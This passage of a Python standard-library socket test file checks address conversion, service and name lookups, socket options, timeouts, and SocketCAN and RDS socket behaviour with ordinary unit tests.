_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
def testNtoHErrors(self):
good_values = [ 1, 2, 3, 1, 2, 3 ]
bad_values = [ -1, -2, -3, -1, -2, -3 ]
for k in good_values:
socket.ntohl(k)
socket.ntohs(k)
socket.htonl(k)
socket.htons(k)
for k in bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htonl, k)
self.assertRaises(OverflowError, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:')
assertInvalid('1:2:3:4:5:6:7:8:0')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
        # it is reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# A file object made from the socket keeps it referenced; the ResourceWarning
# is only emitted once the file object is dereferenced as well
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_uknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd, because on this path it doesn't actually verify the family and
# type; it just populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, _ = tempfile.mkstemp()
with socket.socket(family=42424, type=13331, fileno=fd) as s:
self.assertEqual(s.family, 42424)
self.assertEqual(s.type, 13331)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, so use 1024 to be safe
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
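# A raw CAN filter is a (can_id, can_mask) pair packed as two native
# unsigned ints; a frame matches when (received_id & can_mask) == (can_id & can_mask).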
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
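# The header fields below correspond to struct bcm_msg_head from
# <linux/can/bcm.h>: opcode, flags, count, ival1 (sec/usec), ival2
# (sec/usec), can_id and nframes, followed by the CAN frame(s) themselves.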
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testCongestion(self):
# wait until the sender is done
self.evt.wait()
def _testCongestion(self):
# test the behavior in case of congestion
self.data = b'fill'
self.cli.setblocking(False)
try:
# try to lower the receiver's socket buffer size
self.cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 16384)
except OSError:
pass
with self.assertRaises(OSError) as cm:
try:
# fill the receiver's socket buffer
while True:
self.cli.sendto(self.data, 0, (HOST, self.port))
finally:
# signal the receiver we're done
self.evt.set()
# sendto() should have failed with ENOBUFS
